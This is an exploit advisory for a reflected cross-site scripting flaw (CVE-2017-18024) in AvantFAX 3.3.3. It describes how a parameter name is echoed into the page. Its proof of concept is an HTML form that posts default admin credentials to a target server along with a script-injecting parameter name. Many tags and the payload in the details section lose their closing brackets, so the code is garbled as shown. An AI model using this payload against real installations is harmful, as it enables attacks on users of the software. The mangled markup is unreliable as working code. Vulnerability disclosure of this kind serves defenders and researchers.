# Title: AvantFAX 3.3.3 - XSS
# Author: Nassim Asrir
# Contact: wassline@gmail.com
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18024
# Description
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
as demonstrated by a parameter whose name contains a
SCRIPT element and whose value is 1.
------------------------------------------
# Details
The name of an arbitrarily supplied body parameter is copied into the
HTML document as plain text between tags. The payload
jlbqg<scriptalert(1)</scriptb7g0x was submitted in the name of an
arbitrarily supplied body parameter. This input was echoed
------------------------------------------
#Attack Type
Remote
------------------------------------------
# POC
<html>
<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/" method="POST"
<input type="hidden" name="username" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="_submit_check" value="1" /
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" /
<input type="submit" value="Submit request" /
</form
</body
</html